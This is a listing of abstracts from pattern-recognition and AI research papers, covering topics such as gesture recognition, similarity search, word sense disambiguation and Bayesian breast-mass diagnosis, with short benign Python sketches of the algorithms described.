Rodríguez, Luis-Felipe; Ramos, Félix
Cognitive architectures allow the emergence of behaviors in autonomous agents. Their design is commonly based on multidisciplinary theories and models that explain the mechanisms underlying human behaviors, as well as on standards and principles used in the development of software systems. The formal and rigorous description of such architectures, however, is a software engineering practice that has barely been implemented. In this paper, we present the formal specification of a neuroscience-inspired cognitive architecture, which ensures its proper development and subsequent operation, as well as the unambiguous communication of its operational and architectural assumptions. In particular, we use the Real-Time Process Algebra to formally describe its architectural components and emerging behaviors.
By
Montero, José Antonio; Sucar, L. Enrique
1 Citations
Most gesture recognition systems are based only on hand motion information and are designed mainly for communicative gestures. However, many activities of everyday life involve interaction with surrounding objects. We propose a new approach for the recognition of manipulative gestures that interact with objects in the environment. The method uses non-intrusive vision-based techniques. The hands of a person are detected and tracked using an adaptive skin color segmentation process, so the system can operate in a wide range of lighting conditions. Gesture recognition is based on hidden Markov models, combining motion and contextual information, where the context refers to the relation of the position of the hand to other objects. The approach was implemented and evaluated in two different domains, video conferencing and assistance, obtaining gesture recognition rates from 94% to 99.47%. The system is very efficient, so it is adequate for use in real-time applications.
By
Lara-Alvarez, Carlos; Rojas, Alfonso; Bayro-Corrochano, Eduardo
The Place Recognition (PR) problem is fundamental for real-time applications such as mobile robots (e.g., to detect loop closures) and guidance systems for the visually impaired. The Bag of Words (BoW) is a conventional approach that calculates a histogram of frequencies. One of the disadvantages of the BoW representation is that it loses information about the spatial location of features in the image. In this paper we study an approximate index based on the classic q-gram paradigm to retrieve images. Similar to the BoW, our approach detects interest points and assigns labels. Each image is represented by a set of q-grams obtained from triangles of a Delaunay decomposition. This representation allows us to create an index and to retrieve images efficiently. The proposed approach is path independent and was tested with a publicly available dataset, showing a high recall rate and reduced time complexity.
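The indexing idea can be sketched as an inverted index over label triples. This is a simplified illustration, not the paper's implementation: interest-point detection, labeling, and the Delaunay decomposition are assumed to be already done, and the triangle canonicalization and voting scheme below are hypothetical choices.

```python
from collections import defaultdict

def triangle_qgrams(labels, triangles):
    """Turn each triangle (indices of three interest points) into a
    canonical 3-gram of its vertex labels, so spatial co-location of
    features is retained, unlike in a plain bag of words."""
    return {tuple(sorted(labels[v] for v in tri)) for tri in triangles}

def build_index(images):
    # images: {image_id: (labels, triangles)}; Delaunay step omitted here.
    index = defaultdict(set)
    for img_id, (labels, tris) in images.items():
        for g in triangle_qgrams(labels, tris):
            index[g].add(img_id)
    return index

def query(index, labels, triangles):
    """Rank database images by the number of q-grams shared with the query."""
    votes = defaultdict(int)
    for g in triangle_qgrams(labels, triangles):
        for img_id in index.get(g, ()):
            votes[img_id] += 1
    return sorted(votes, key=votes.get, reverse=True)
```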
By
Silván-Cárdenas, José Luis; Wang, Le
Building footprint geometry is a basic layer of information required by government institutions for a number of land management operations and research. LiDAR (light detection and ranging) is a laser-based altimetry measurement instrument that is flown over relatively wide land areas in order to produce digital surface models. Although high-spatial-resolution LiDAR measurements (of around 1 m horizontally) are suitable for detecting above-ground features through elevation discrimination, the automatic extraction of buildings in many cases, such as in residential areas with complex terrain forms, has proved a difficult task. In this study, we developed a method for detecting building footprints from LiDAR altimetry data and tested its performance over four sites located in Austin, TX. Compared to another standard method, the proposed method had comparable accuracy and better efficiency.
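The elevation-discrimination step mentioned above is commonly done by thresholding the difference between the digital surface model and a bare-earth terrain model. A minimal sketch with an assumed 2.5 m threshold; the hard parts the paper addresses (separating buildings from vegetation in complex terrain, recovering footprint geometry) are not shown.

```python
def above_ground_mask(dsm, dtm, min_height=2.5):
    """Flag grid cells whose surface elevation exceeds the bare-earth
    terrain by more than `min_height` metres (a hypothetical threshold).
    The normalized difference dsm - dtm isolates above-ground features
    such as buildings and trees from terrain relief."""
    return [[(s - t) > min_height for s, t in zip(srow, trow)]
            for srow, trow in zip(dsm, dtm)]
```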
By
Garcia-Ceja, Enrique; Brena, Ramon; Galván-Tejada, Carlos E.
1 Citations
Most of the previous works in hand gesture recognition focus on increasing the accuracy and robustness of the systems; however, little has been done to understand the context in which the gestures are performed, i.e., the same gesture could mean different things depending on the context and situation. Understanding the context may help to build more user-friendly and interactive systems. In this work, we used location information in order to contextualize the gestures. The system constantly identifies the location of the user, so when he/she performs a gesture the system can perform an action based on this information.
By
Osorio, Mauricio; Navarro, Juan Antonio
We develop some ideas in order to obtain a nonmonotonic reasoning system based on the modal logic S4. As a consequence, we show how to express the well-known answer set semantics using a restricted fragment of modal formulas. Moreover, by considering the full set of modal formulas, we obtain an interesting generalization of answer sets for logic programs with modal connectives. We also depict, by the use of examples, possible applications of this inference system.
It is also possible to replace the modal logic S4 with any other modal logic to obtain similar nonmonotonic systems. We even consider the use of multimodal logics in order to model the knowledge and beliefs of agents in a scenario where their ability to reason about each other’s knowledge is relevant. Our results establish interesting links between answer sets, modal logics, and multi-agent systems.
By
Alejo, R.; Sotoca, J. M.; Valdovinos, R. M.; Toribio, P.
1 Citations
The quality and size of the training data set have a critical effect on the ability of artificial neural networks to generalize from the training examples. Several approaches form training data sets by identifying border examples or core examples, with the aim of improving the accuracy of network classification and generalization. However, refining the data sets by eliminating outlier examples may increase the accuracy too. In this paper, we analyze the use of different editing schemes based on the nearest neighbor rule on the most popular neural network architectures.
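One classic nearest-neighbor editing scheme of the kind discussed is Wilson's Edited Nearest Neighbor (ENN) rule. A minimal sketch, assuming numeric features and squared Euclidean distance; the paper compares several such schemes, not necessarily this exact one.

```python
from collections import Counter

def edit_enn(samples, labels, k=3):
    """Wilson's ENN editing: drop every training example that is
    misclassified by a majority vote of its k nearest neighbors,
    removing likely outliers/noise before training a classifier."""
    def dist(a, b):
        return sum((x - y) ** 2 for x, y in zip(a, b))
    keep = []
    for i, (x, y) in enumerate(zip(samples, labels)):
        others = [(dist(x, samples[j]), labels[j])
                  for j in range(len(samples)) if j != i]
        others.sort(key=lambda t: t[0])
        vote = Counter(lab for _, lab in others[:k]).most_common(1)[0][0]
        if vote == y:            # kept only if its neighborhood agrees
            keep.append(i)
    return keep
```

The function returns the indices of the retained examples, so the caller can rebuild the edited training set.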
By
Figueroa, Karina; Paredes, Rodrigo; Camarena-Ibarrola, J. Antonio; Reyes, Nora
1 Citations
Similarity searching consists in retrieving from a database the objects, also known as nearest neighbors, that are most similar to a given query; it is a crucial task in several applications of the pattern recognition problem. In this paper we propose a new technique to reduce the number of comparisons needed to locate the nearest neighbors of a query. This new index takes advantage of two known algorithms: FHQT (Fixed Height Queries Tree) and PBA (Permutation-Based Algorithm), the former suited to low dimensions and the latter to high dimensions. Our results show that this combination brings out the best of both algorithms: it locates nearest neighbors up to four times faster in high dimensions, while leaving the well-known good performance of FHQT in low dimensions unaffected.
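The PBA side of the combination can be sketched briefly: each object is signed by the order in which it sees a set of pivots, and candidates are ranked by how much their pivot orderings differ from the query's. A minimal illustration under assumed choices (Spearman footrule as the permutation distance); the paper's index structure is not reproduced here.

```python
def permutation(point, pivots, dist):
    """PBA signature: pivot indices ordered by closeness to the point."""
    return sorted(range(len(pivots)), key=lambda i: dist(point, pivots[i]))

def footrule(p, q):
    """Spearman footrule between two permutations. Objects whose pivot
    orderings agree with the query's are likely close, so the database
    is scanned in increasing footrule order and only the top fraction
    is compared directly against the query."""
    pos_q = {v: i for i, v in enumerate(q)}
    return sum(abs(i - pos_q[v]) for i, v in enumerate(p))
```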
By
Pinto, David; Vilariño, Darnes; Balderas, Carlos; Tovar, Mireya; Beltrán, Beatriz
1 Citations
Word Sense Disambiguation (WSD) is considered one of the most important problems in Natural Language Processing [1]. It is claimed that WSD is essential for those applications that require language comprehension modules, such as search engines, machine translation systems, automatic answering machines, second life agents, etc. Moreover, given the huge amounts of information on the Internet and the fact that this information is continuously growing in different languages, we are encouraged to deal with cross-lingual scenarios where WSD systems are also needed. On the other hand, Lexical Substitution (LS) refers to the process of finding a substitute word for a source word in a given sentence. The LS task needs to be approached by first disambiguating the source word; therefore, these two tasks (WSD and LS) are somehow related. In this paper, we present a naïve approach to tackle the problem of cross-lingual WSD and cross-lingual lexical substitution. We use a bilingual statistical dictionary, which is calculated with Giza++ using the EUROPARL parallel corpus, in order to calculate the probability of a source word being translated to a target word (which is assumed to be the correct sense of the source word, but in a different language). Two versions of the probabilistic model are tested: unweighted and weighted. The results were compared with those of an international competition, obtaining a good performance.
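The core selection step can be sketched as an argmax over translation probabilities. This is a toy illustration, not the paper's model: the probability table and the context-weighting scheme below are invented stand-ins for what one might estimate from Giza++ alignments over EUROPARL.

```python
def best_translation(source_word, context, prob, weights=None):
    """Pick the target word maximizing p(t|s) — the unweighted model.
    The weighted variant multiplies in a per-context-word factor.
    `prob` maps (source, target) -> probability (toy numbers here)."""
    candidates = {t for (s, t) in prob if s == source_word}
    def score(t):
        p = prob.get((source_word, t), 0.0)
        if weights:  # weighted version: context words modulate the score
            for c in context:
                p *= weights.get((c, t), 1.0)
        return p
    return max(candidates, key=score)
```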
By
Salgado-Garza, Luis R.; Nolazco-Flores, Juan A.
This document describes the realization of a spoken information retrieval system and its application to word search in an indexed video database. The system uses automatic speech recognition (ASR) software to convert the audio signal of a video file into a transcript file, and then a document indexing tool to index this transcribed file. Then, a spoken query, uttered by any user, is presented to the ASR to decode the audio signal and propose a hypothesis that is later used to formulate a query to the indexed database. The final outcome of the system is a list of video frame tags containing the audio corresponding to the spoken query. The speech recognition system achieved less than 15% Word Error Rate (WER), and its combined operation with the document indexing system showed outstanding performance with spoken queries.
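The WER figure quoted above is the standard ASR metric: word-level edit distance between the reference transcript and the recognizer's hypothesis, divided by the reference length. A self-contained computation for reference:

```python
def wer(reference, hypothesis):
    """Word Error Rate: (substitutions + insertions + deletions) at the
    word level, divided by the number of reference words, computed via
    dynamic-programming edit distance."""
    ref, hyp = reference.split(), hypothesis.split()
    d = [[0] * (len(hyp) + 1) for _ in range(len(ref) + 1)]
    for i in range(len(ref) + 1):
        d[i][0] = i
    for j in range(len(hyp) + 1):
        d[0][j] = j
    for i in range(1, len(ref) + 1):
        for j in range(1, len(hyp) + 1):
            cost = 0 if ref[i - 1] == hyp[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,         # deletion
                          d[i][j - 1] + 1,         # insertion
                          d[i - 1][j - 1] + cost)  # substitution / match
    return d[-1][-1] / len(ref)
```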
By
Rosales-Pérez, Alejandro; Gonzalez, Jesus A.; Coello Coello, Carlos A.; Reyes-Garcia, Carlos A.; Escalante, Hugo Jair
1 Citations
This paper introduces EMOPG+FS, a novel approach to prototype generation and feature selection that explicitly minimizes the classification error rate, the number of prototypes, and the number of features. Under EMOPG+FS, prototypes are initialized from a subset of training instances, whose positions are adjusted through a multiobjective evolutionary algorithm. The optimization process aims to find a set of suitable solutions that represent the best possible tradeoffs among the considered criteria. Besides this, we also propose a strategy for selecting a single solution from the several that are generated during the multiobjective optimization process. We assess the performance of our proposed EMOPG+FS using a suite of benchmark data sets and compare its results with those obtained by other evolutionary and non-evolutionary techniques. Our experimental results indicate that our proposed approach is able to achieve highly competitive results.
By
Hernández-Rodríguez, Selene; Martínez-Trinidad, J. Francisco; Carrasco-Ochoa, J. Ariel
1 Citations
In this work, a fast k most similar neighbor (k-MSN) classifier for mixed data is presented. The k nearest neighbor (k-NN) classifier has been a widely used nonparametric technique in Pattern Recognition. Many fast k-NN classifiers have been developed to be applied to numerical object descriptions, most of them based on metric properties to avoid object comparisons. However, in some sciences such as Medicine, Geology, and Sociology, objects are usually described by numerical and non-numerical features (mixed data). In this case, we cannot assume that the comparison function satisfies metric properties. Therefore, our classifier is based on search algorithms suitable for mixed data and non-metric comparison functions. Some experiments and a comparison against two other fast k-NN methods, using standard databases, are presented.
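A concrete example of a mixed-data comparison function is the Heterogeneous Euclidean-Overlap Metric (HEOM): range-normalized differences for numeric features and 0/1 overlap for categorical ones. The paper does not fix this particular function — it is shown here only as a common illustration of comparing numerical and non-numerical features together, and its algorithms also admit non-metric choices.

```python
def heom(x, y, numeric, ranges):
    """Heterogeneous Euclidean-Overlap dissimilarity for mixed data.
    `numeric` is the set of numeric feature indices; `ranges` maps each
    numeric index to its value range, used for normalization."""
    total = 0.0
    for i, (a, b) in enumerate(zip(x, y)):
        if i in numeric:
            total += ((a - b) / ranges[i]) ** 2   # normalized numeric diff
        else:
            total += 0.0 if a == b else 1.0       # categorical overlap
    return total ** 0.5
```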
By
Galicia-Haro, Sofía N.
1 Citations
We consider temporal expressions formed by a noun of time reinforced by an adverb of time, in order to extend the range of annotation of temporal expressions. For this, we analyze some groups of such expressions to build finite state automata that automatically determine this type of expression and capture their meaning. To determine the extent of annotation, we present a method for obtaining the most preferable variants from the Internet.
By
Quintero, Rolando; Levachkine, Serguei; Torres, Miguel; Moreno, Marco
1 Citations
In this work, we present an algorithm for increasing spectral resolution in a DEM. The algorithm is based on the 8-connected skeleton of the polygons formed by the contour lines, which is pruned by translating it into a graph. This is an alternative to vector interpolation processes. With this approach, it is possible to find new elevation data from the information contained in the DEM and generate new data with the same spatial resolution.
By
Barandela, Ricardo; Valdovinos, Rosa M.; Sánchez, J. Salvador; Ferri, Francesc J.
35 Citations
The problem of imbalanced training sets in supervised pattern recognition methods is receiving growing attention. An imbalanced training set means that one class is represented by a large number of examples while the other is represented by only a few. It has been observed that this situation, which arises in several practical domains, may produce an important deterioration of the classification accuracy, in particular with patterns belonging to the less represented classes. In this paper we present a study concerning the relative merits of several resizing techniques for handling the imbalance issue. We also assess the convenience of combining some of these techniques.
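One of the simplest resizing techniques of the kind surveyed is random undersampling of the majority class. A minimal sketch, offered only as an illustration of the family of methods; the paper evaluates several resizing techniques, not this one specifically.

```python
import random

def undersample(samples, labels, seed=0):
    """Random undersampling: discard majority-class examples at random
    until every class has as many examples as the smallest one, yielding
    a balanced (sample, label) list."""
    rng = random.Random(seed)
    by_class = {}
    for s, y in zip(samples, labels):
        by_class.setdefault(y, []).append(s)
    n_min = min(len(group) for group in by_class.values())
    out = []
    for y, group in by_class.items():
        for s in rng.sample(group, n_min):  # keep n_min examples per class
            out.append((s, y))
    return out
```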
By
Escarcega, David; Ramos, Fernando; Espinosa, Ana; Berumen, Jaime
Cervical Cancer (CC) is the result of infection by high-risk Human Papilloma Viruses. mRNA microarray expression data provide biologists with evidence of cellular compensatory gene expression mechanisms in CC progression. Pattern recognition of signalling pathways through expression data can reveal interesting insights for the understanding of CC. Consequently, gene expression data must be submitted to different preprocessing tasks. In this paper we propose a methodology based on the integration of expression data and signalling pathways as a necessary phase for pattern recognition within signalling CC pathways. Our results provide a top-down interpretation approach in which biologists interact with the recognized patterns inside signalling pathways.
By
Rodríguez-López, Verónica; Cruz-Barbosa, Raúl
2 Citations
Nowadays, breast cancer is considered a significant health problem in Mexico. Mammography is an effective study for the early detection of signs of this disease. One of the most important findings in this study is a mass, which is the main indicator of malignancy. However, mass detection and diagnosis are difficult. In this study, the impact of the inclusion of seven clinical features on the performance of Bayesian network models for mass diagnosis is presented. Here, Naïve Bayes, Tree Augmented Naïve Bayes, K-dependence Bayesian classifier, and Forest Augmented Naïve Bayes models with eight image feature nodes were augmented with several clinical feature subsets. These models were trained with a data set extracted from the public BCDR-F01 database. The experimental results have shown that the Bayesian network models augmented with a subset of three clinical features improved their performance up to 0.82 in accuracy, 0.80 in sensitivity, and 0.83 in specificity. Therefore, these augmented models are considered suitable and promising methods for mass classification.
